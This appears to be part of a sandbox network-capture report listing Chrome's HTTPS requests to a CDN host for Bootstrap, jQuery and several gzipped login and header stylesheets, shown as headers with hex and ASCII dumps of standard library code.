                                                      Alt-Svc: h3="67e285f0.t74nx2b2.com:443";ma=604800;persist=1,h2="bt5.tuf3a353.com:443";ma=604800;persist=1
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:05 GMT
                                                      ETag: "5fc5abd9-90b5"
                                                      X-Cache-Status: HIT
                                                      Server: nginx
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:44 UTC15968INData Raw: 2f 2a 21 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 33 2e 33 2e 37 20 28 68 74 74 70 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 36 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 20 2a 2f 0a 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 6a 51 75 65 72 79 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 42 6f 6f 74 73 74 72 61 70 27 73 20 4a 61 76 61 53 63 72 69 70 74 20 72 65 71 75 69 72 65 73 20 6a 51 75 65 72 79 22 29 3b 2b 66 75 6e 63 74 69 6f 6e 28 61 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 62 3d 61 2e 66 6e 2e 6a 71 75 65 72
                                                      Data Ascii: /*! * Bootstrap v3.3.7 (http://getbootstrap.com) * Copyright 2011-2016 Twitter, Inc. * Licensed under the MIT license */if("undefined"==typeof jQuery)throw new Error("Bootstrap's JavaScript requires jQuery");+function(a){"use strict";var b=a.fn.jquer
                                                      2025-01-12 23:47:44 UTC16384INData Raw: 28 22 69 6e 22 29 2e 6f 66 66 28 22 63 6c 69 63 6b 2e 64 69 73 6d 69 73 73 2e 62 73 2e 6d 6f 64 61 6c 22 29 2e 6f 66 66 28 22 6d 6f 75 73 65 75 70 2e 64 69 73 6d 69 73 73 2e 62 73 2e 6d 6f 64 61 6c 22 29 2c 74 68 69 73 2e 24 64 69 61 6c 6f 67 2e 6f 66 66 28 22 6d 6f 75 73 65 64 6f 77 6e 2e 64 69 73 6d 69 73 73 2e 62 73 2e 6d 6f 64 61 6c 22 29 2c 61 2e 73 75 70 70 6f 72 74 2e 74 72 61 6e 73 69 74 69 6f 6e 26 26 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 68 61 73 43 6c 61 73 73 28 22 66 61 64 65 22 29 3f 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 6f 6e 65 28 22 62 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 22 2c 61 2e 70 72 6f 78 79 28 74 68 69 73 2e 68 69 64 65 4d 6f 64 61 6c 2c 74 68 69 73 29 29 2e 65 6d 75 6c 61 74 65 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64
                                                      Data Ascii: ("in").off("click.dismiss.bs.modal").off("mouseup.dismiss.bs.modal"),this.$dialog.off("mousedown.dismiss.bs.modal"),a.support.transition&&this.$element.hasClass("fade")?this.$element.one("bsTransitionEnd",a.proxy(this.hideModal,this)).emulateTransitionEnd
                                                      2025-01-12 23:47:44 UTC4693INData Raw: 65 73 74 28 22 6c 69 2e 64 72 6f 70 64 6f 77 6e 22 29 2e 61 64 64 43 6c 61 73 73 28 22 61 63 74 69 76 65 22 29 29 2c 64 2e 74 72 69 67 67 65 72 28 22 61 63 74 69 76 61 74 65 2e 62 73 2e 73 63 72 6f 6c 6c 73 70 79 22 29 7d 2c 62 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6c 65 61 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 61 28 74 68 69 73 2e 73 65 6c 65 63 74 6f 72 29 2e 70 61 72 65 6e 74 73 55 6e 74 69 6c 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 74 61 72 67 65 74 2c 22 2e 61 63 74 69 76 65 22 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 61 63 74 69 76 65 22 29 7d 3b 76 61 72 20 64 3d 61 2e 66 6e 2e 73 63 72 6f 6c 6c 73 70 79 3b 61 2e 66 6e 2e 73 63 72 6f 6c 6c 73 70 79 3d 63 2c 61 2e 66 6e 2e 73 63 72 6f 6c 6c 73 70 79 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 62 2c
                                                      Data Ascii: est("li.dropdown").addClass("active")),d.trigger("activate.bs.scrollspy")},b.prototype.clear=function(){a(this.selector).parentsUntil(this.options.target,".active").removeClass("active")};var d=a.fn.scrollspy;a.fn.scrollspy=c,a.fn.scrollspy.Constructor=b,


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      20192.168.2.44976420.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:44 UTC571OUTGET /plus/css/unite/login_unite.css?ver=1614680240 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: text/css,*/*;q=0.1
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: style
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:45 UTC322INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:45 GMT
                                                      Content-Type: text/css
                                                      Content-Length: 155
                                                      Connection: close
                                                      Cteonnt-Length: 170
                                                      Last-Modified: Tue, 02 Mar 2021 10:17:20 GMT
                                                      ETag: "603e10b0-aa"
                                                      Access-Control-Allow-Origin: *
                                                      Content-Encoding: gzip
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:45 UTC155INData Raw: 1f 8b 08 00 00 00 00 00 00 03 d3 cb c9 4f cf cc d3 cd cd 4f 49 cc d1 4d ca 4f a9 54 d0 4b 2f ca 2f 2d d0 cd 49 4c 4a cd a9 e6 e2 4c c9 2c 2e c8 49 ac b4 52 c8 cb cf 4b e5 aa e5 d2 c3 d4 00 16 89 2f cd cb 2c 49 8d 4f cb cf 2f 49 2d 42 d7 67 0d d4 a8 af f5 64 57 cf b3 35 0b 5f ae ea 79 b1 be 51 4b 9f 4b af b8 3c 35 b5 44 37 31 27 b5 a8 44 21 2d 33 35 27 a5 38 b5 44 c1 4e 21 33 af a0 b4 44 01 68 44 72 7e 4e 7e 91 95 82 b2 81 81 01 d0 00 00 1b c2 17 6c aa 00 00 00
                                                      Data Ascii: OOIMOTK//-ILJL,.IRK/,IO/I-BgdW5_yQKK<5D71'D!-35'8DN!3DhDr~N~l


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      21192.168.2.44976320.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:44 UTC573OUTGET /plus/css/custom/login_custom.css?ver=1663905027 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: text/css,*/*;q=0.1
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: style
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:45 UTC321INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:45 GMT
                                                      Content-Type: text/css
                                                      Content-Length: 92
                                                      Connection: close
                                                      Cteonnt-Length: 105
                                                      Last-Modified: Fri, 23 Sep 2022 03:50:27 GMT
                                                      ETag: "632d2d03-69"
                                                      Access-Control-Allow-Origin: *
                                                      Content-Encoding: gzip
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:45 UTC92INData Raw: 1f 8b 08 00 00 00 00 00 00 03 d3 cb c9 4f cf cc d3 cd cd 4f 49 cc d1 4d ca 4f a9 54 d0 4b 2f ca 2f 2d d0 cd 49 4c 4a cd a9 e6 e2 4c c9 2c 2e c8 49 ac b4 52 c8 cb cf 4b e5 aa e5 d2 c3 d4 00 16 89 2f cd cb 2c 49 8d 4f cb cf 2f 49 2d 42 d7 67 cd 55 0b 00 ed 5b 54 84 69 00 00 00
                                                      Data Ascii: OOIMOTK//-ILJL,.IRK/,IO/I-BgU[Ti


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      22192.168.2.44976520.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:44 UTC572OUTGET /plus/css/unite/header_unite.css?ver=1618279364 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: text/css,*/*;q=0.1
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: style
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:45 UTC326INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:45 GMT
                                                      Content-Type: text/css
                                                      Content-Length: 1688
                                                      Connection: close
                                                      Cteonnt-Length: 4646
                                                      Last-Modified: Tue, 13 Apr 2021 02:02:44 GMT
                                                      ETag: "6074fbc4-1226"
                                                      Access-Control-Allow-Origin: *
                                                      Content-Encoding: gzip
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:45 UTC1688INData Raw: 1f 8b 08 00 00 00 00 00 00 03 95 58 59 6f db 46 10 7e f7 af 58 c4 30 7c c0 94 29 59 27 09 14 39 9a 00 05 d2 3e a5 cf c2 8a 5c 4a 5b 93 5c 81 5c da 4e 05 03 c9 43 8b e6 7a 6b 1c 34 2f 69 d2 24 48 1b 24 45 81 3e b4 e8 f1 6b ea eb 5f 74 f6 e0 25 52 b1 23 43 b6 48 ce ee cc 7e f3 cd 37 23 5f 76 26 38 8a 09 47 97 be bc 75 c3 e8 5f b2 97 96 b6 36 36 d0 f1 c3 7b 67 df 3d 3e 7a 74 e7 e8 f9 7d e3 bf 3f ee 1f 1f fe 79 f2 e8 cd c9 db 07 68 63 63 6b a9 c1 f8 84 44 43 9f 86 3b 33 e4 d2 78 ea e3 db 16 f2 7c b2 6f a3 af 92 98 53 ef b6 e1 b0 90 93 90 ab db 06 09 5d 1b 4d b1 eb d2 70 6c f5 a7 fb a8 0b 6f 73 0a f6 23 b6 6f c4 f4 6b 71 1f 3e 47 2e 89 0c b8 65 a3 00 ef 1b 7b d4 e5 13 6b 30 e8 08 c3 00 47 63 1a 5a 26 c2 09 67 f6 41 31 08 84 67 c8 61 3e 8b 2c b4 3c 70 1d 32 f2
                                                      Data Ascii: XYoF~X0|)Y'9>\J[\\NCzk4/i$H$E>k_t%R#CH~7#_v&8Gu_66{g=>zt}?yhcckDC;3x|oS]Mplos#okq>G.e{k0GcZ&gA1ga>,<p2


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      23192.168.2.44976820.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:44 UTC574OUTGET /plus/css/custom/header_custom.css?ver=1685593131 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: text/css,*/*;q=0.1
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: style
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:45 UTC326INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:45 GMT
                                                      Content-Type: text/css
                                                      Content-Length: 1544
                                                      Connection: close
                                                      Cteonnt-Length: 4669
                                                      Last-Modified: Thu, 01 Jun 2023 04:18:51 GMT
                                                      ETag: "64781c2b-123d"
                                                      Access-Control-Allow-Origin: *
                                                      Content-Encoding: gzip
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:45 UTC1544INData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 58 5b 6f db 36 14 7e ef af e0 1a 14 6d b2 c8 96 1d 3b f1 05 08 96 14 ed b6 87 61 0f db 9e 03 4a a2 2c 36 12 29 50 54 92 c6 e8 7f df 39 bc c8 94 ad a4 ee b0 16 08 62 f2 dc f9 9d f3 1d e7 97 b4 a0 aa 61 9a bc fd e7 ef cf d1 e2 ed fa cd a8 60 34 63 ea 8e 2a 46 b7 6f 08 fc 4b a4 82 83 28 91 5a cb 6a 45 26 f5 13 69 64 c9 33 72 32 8b 6f ae 16 37 6b 27 f5 14 35 05 cd e4 e3 8a 08 29 98 3d ad a8 da 70 d1 e9 b6 02 7c 39 79 9a de 6f 94 6c 45 16 a5 b2 94 6a 45 4e 26 b3 45 3c 07 c5 6f 5d 10 5a d6 c7 c6 b0 53 c2 c8 ef 1e 15 75 aa 8f 3c d3 05 a8 c4 71 5c 3f 85 51 ad 48 4c 68 ab 65 a8 0b 59 58 ad 82 f1 4d a1 8d 9a d7 aa 69 96 71 b1 89 94 bb 99 e3 c5 4e b5 94 1b 69 75 bd 60 c9 f2 50 4e ea 02 c5 b8 b8 ef 89 ad 62 6b fe 4b db 68 9e 7f 85 6a
                                                      Data Ascii: X[o6~m;aJ,6)PT9ba`4c*FoK(ZjE&id3r2o7k'5)=p|9yolEjEN&E<o]ZSu<q\?QHLheYXMiqNiu`PNbkKhj


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      24192.168.2.44976620.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:44 UTC576OUTGET /plugins/jquery-ui/jquery-ui.min.css?ver=1606790105 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: text/css,*/*;q=0.1
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: style
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:45 UTC290INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:45 GMT
                                                      Content-Type: text/css
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:05 GMT
                                                      ETag: W/"5fc5abd9-7d4c"
                                                      Access-Control-Allow-Origin: *
                                                      Content-Encoding: gzip
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      2025-01-12 23:47:45 UTC3806INData Raw: 32 33 39 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 3d 69 73 ea 48 92 df e7 57 b0 dd d1 1d dd e3 27 1b c4 61 63 c7 db 0d b0 cd e1 0b 1b db 5c 5f 26 04 92 40 46 48 42 12 97 1d f3 df 37 eb 92 4a 52 95 f0 9b 5d 1c fd 1a 95 2a b3 f2 ae ac 93 b3 7f fe 57 e1 e3 65 63 f8 87 c2 7b b7 a0 14 b6 a5 d3 92 7a 5a 82 6f 6a b1 54 53 8a 75 a5 54 f9 c7 3f 0b 8b 30 f4 2e cf ce 3e d6 a8 e6 c6 3a 9d b9 2b 28 ed 3a 33 7b a3 1b c1 65 61 e6 fa c6 e9 2c 08 7e 14 b4 19 7c d7 2d d7 a1 8f 9b d0 85 ca 9e 6d 84 b4 c2 ca 70 36 e4 dd 74 13 86 ac de cc 75 42 df b5 e7 be bb f1 c8 db d9 c2 98 2d a7 ee de d7 00 1b 29 d2 b5 d0 f0 ac d9 d2 f0 e9 b3 a5 d9 ee 9c 7e f7 b5 f9 5c 9b da b4 15 df 08 ac cf f8 d1 f3 dd 39 14 05 53 8d 82 06 86 6d cc c2 b8 02 79 8e 69 0b 6c 4b 67 cd 04 ae cf d7 f4 2c c7
                                                      Data Ascii: 239c=isHW'ac\_&@FHB7JR]*Wec{zZojTSuT?0.>:+(:3{ea,~|-mp6tuB-)~\9SmyilKg,
                                                      2025-01-12 23:47:45 UTC4096INData Raw: 17 ab ad 41 eb e9 e6 65 d0 6c 3d 5a 95 5d 63 87 37 44 2c 4e 5e 5e ee f0 86 89 eb 1d ae 8e 61 1b 8d eb e5 78 f7 b4 1e f9 fa 75 55 bd 79 2d d6 b4 f3 c7 d6 a4 7b 52 69 75 9a d7 f7 ee 8d 31 bc 1f ad 0f ab e7 75 7b bd df de f9 a3 c9 f4 71 7f fe 16 ce 4e 76 f5 d1 fc 5d 6d 35 cb 76 ef f0 d2 1f de be a9 dd 56 db 7a af af 4a a6 7f 33 f0 f6 93 c9 ac 36 35 3b bb 6d 65 56 1a 8f 9e 6b cb d2 40 3f a8 75 b5 35 ad bd 2f 37 db 56 38 f2 b6 c3 d7 cf c6 49 e7 30 1b dd 75 de 47 56 7b dc b5 1e e7 6a bf 36 ac 54 eb 73 67 d8 36 3b 4f fa 47 77 7d 33 1c ac 8d 55 47 35 96 5e 6f 0a ff d9 9e 37 7c 5f 4f ac b5 5f 33 f4 f5 7a f8 d2 68 74 cd e5 ed f5 0b f0 f9 d2 08 30 73 d7 f3 06 f0 d7 68 78 af 8f f3 89 d3 36 b5 f5 6c 5e ba 55 37 9b cf 9b d5 aa f3 de ec 5f bc 58 76 bd ba b0 9e ef d7 43
                                                      Data Ascii: Ael=Z]c7D,N^^axuUy-{Riu1u{qNv]m5vVzJ365;meVk@?u5/7V8I0uGV{j6Tsg6;OGw}3UG5^o7|_O_3zht0shx6l^U7_XvC
                                                      2025-01-12 23:47:45 UTC1227INData Raw: 80 98 68 12 c0 31 76 3b d8 05 25 1c a4 10 a3 4c d6 f7 0d 2c 34 31 00 62 37 cd 47 b0 d8 98 26 ba 49 3a 5a cb 89 77 ad 61 96 d3 00 21 6c 28 0a 4c 74 b3 b0 c4 c5 15 62 81 49 ba 18 14 89 0e 52 50 6a 83 49 58 13 ee 71 81 f6 60 26 1f 5f d9 0c 17 b7 08 68 05 05 a1 76 63 05 51 28 bc 25 53 04 40 f5 93 04 d2 e1 aa 54 d8 a9 0a 57 ae 09 9a c0 29 4d ba 19 06 a1 4c c5 30 44 49 c9 56 d0 5d 91 e2 da 44 43 c9 da 2b cd b2 c9 99 6f 31 e7 54 4b 02 20 39 ef a8 72 9a 93 60 63 85 33 b8 2a 57 4c 19 d5 4c b2 15 f8 45 1f b9 b4 68 50 48 42 c0 5e e5 00 2e a0 16 8a 97 86 82 14 80 0f f7 58 4b ea 13 ff 4f d6 07 43 0b 16 92 fa c4 e9 93 f5 d1 d5 d7 70 8f b6 98 20 92 39 27 01 36 4e 1e 08 ed 97 93 20 53 d7 5d c2 74 ba c4 ed 69 6f 9c 04 09 65 51 85 76 bf c9 da 0b 77 25 56 1b 78 05 56 1c e7
                                                      Data Ascii: h1v;%L,41b7G&I:Zwa!l(LtbIRPjIXq`&_hvcQ(%S@TW)ML0DIV]DC+o1TK 9r`c3*WLLEhPHB^.XKOCp 9'6N S]tioeQvw%VxV


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      25192.168.2.44976720.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:44 UTC643OUTGET /plus/plugin/js/jquery.min.js?ver=1606790105 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:45 UTC319INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:45 GMT
                                                      Content-Type: application/javascript
                                                      Content-Length: 84345
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:05 GMT
                                                      ETag: "5fc5abd9-14979"
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:45 UTC3777INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 32 2e 31 2e 34 20 7c 20 28 63 29 20 32 30 30 35 2c 20 32 30 31 35 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 2c 20 49 6e 63 2e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 2e 64 6f 63 75 6d 65 6e 74 3f 62 28 61 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e 64
                                                      Data Ascii: /*! jQuery v2.1.4 | (c) 2005, 2015 jQuery Foundation, Inc. | jquery.org/license */!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a wind
                                                      2025-01-12 23:47:45 UTC4096INData Raw: 67 75 6d 65 6e 74 73 2c 32 29 2c 66 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 2e 61 70 70 6c 79 28 62 7c 7c 74 68 69 73 2c 65 2e 63 6f 6e 63 61 74 28 64 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 29 29 29 7d 2c 66 2e 67 75 69 64 3d 61 2e 67 75 69 64 3d 61 2e 67 75 69 64 7c 7c 6e 2e 67 75 69 64 2b 2b 2c 66 29 3a 76 6f 69 64 20 30 7d 2c 6e 6f 77 3a 44 61 74 65 2e 6e 6f 77 2c 73 75 70 70 6f 72 74 3a 6b 7d 29 2c 6e 2e 65 61 63 68 28 22 42 6f 6f 6c 65 61 6e 20 4e 75 6d 62 65 72 20 53 74 72 69 6e 67 20 46 75 6e 63 74 69 6f 6e 20 41 72 72 61 79 20 44 61 74 65 20 52 65 67 45 78 70 20 4f 62 6a 65 63 74 20 45 72 72 6f 72 22 2e 73 70 6c 69 74 28 22 20 22 29 2c 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 68 5b 22 5b 6f 62 6a 65 63 74 20 22 2b 62 2b
                                                      Data Ascii: guments,2),f=function(){return a.apply(b||this,e.concat(d.call(arguments)))},f.guid=a.guid=a.guid||n.guid++,f):void 0},now:Date.now,support:k}),n.each("Boolean Number String Function Array Date RegExp Object Error".split(" "),function(a,b){h["[object "+b+
                                                      2025-01-12 23:47:45 UTC4096INData Raw: 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3d 62 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 28 22 69 6e 70 75 74 22 3d 3d 3d 63 7c 7c 22 62 75 74 74 6f 6e 22 3d 3d 3d 63 29 26 26 62 2e 74 79 70 65 3d 3d 3d 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 6f 61 28 61 29 7b 72 65 74 75 72 6e 20 69 61 28 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 62 3d 2b 62 2c 69 61 28 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 76 61 72 20 65 2c 66 3d 61 28 5b 5d 2c 63 2e 6c 65 6e 67 74 68 2c 62 29 2c 67 3d 66 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 67 2d 2d 29 63 5b 65 3d 66 5b 67 5d 5d 26 26 28 63 5b 65 5d 3d 21 28 64 5b 65 5d 3d 63 5b 65 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 70
                                                      Data Ascii: {return function(b){var c=b.nodeName.toLowerCase();return("input"===c||"button"===c)&&b.type===a}}function oa(a){return ia(function(b){return b=+b,ia(function(c,d){var e,f=a([],c.length,b),g=f.length;while(g--)c[e=f[g]]&&(c[e]=!(d[e]=c[e]))})})}function p
                                                      2025-01-12 23:47:45 UTC4096INData Raw: 44 6f 63 75 6d 65 6e 74 7c 7c 61 29 21 3d 3d 6e 26 26 6d 28 61 29 2c 62 3d 62 2e 72 65 70 6c 61 63 65 28 55 2c 22 3d 27 24 31 27 5d 22 29 2c 21 28 21 63 2e 6d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 7c 7c 21 70 7c 7c 72 26 26 72 2e 74 65 73 74 28 62 29 7c 7c 71 26 26 71 2e 74 65 73 74 28 62 29 29 29 74 72 79 7b 76 61 72 20 64 3d 73 2e 63 61 6c 6c 28 61 2c 62 29 3b 69 66 28 64 7c 7c 63 2e 64 69 73 63 6f 6e 6e 65 63 74 65 64 4d 61 74 63 68 7c 7c 61 2e 64 6f 63 75 6d 65 6e 74 26 26 31 31 21 3d 3d 61 2e 64 6f 63 75 6d 65 6e 74 2e 6e 6f 64 65 54 79 70 65 29 72 65 74 75 72 6e 20 64 7d 63 61 74 63 68 28 65 29 7b 7d 72 65 74 75 72 6e 20 67 61 28 62 2c 6e 2c 6e 75 6c 6c 2c 5b 61 5d 29 2e 6c 65 6e 67 74 68 3e 30 7d 2c 67 61 2e 63 6f 6e 74 61 69 6e 73 3d 66 75 6e
                                                      Data Ascii: Document||a)!==n&&m(a),b=b.replace(U,"='$1']"),!(!c.matchesSelector||!p||r&&r.test(b)||q&&q.test(b)))try{var d=s.call(a,b);if(d||c.disconnectedMatch||a.document&&11!==a.document.nodeType)return d}catch(e){}return ga(b,n,null,[a]).length>0},ga.contains=fun
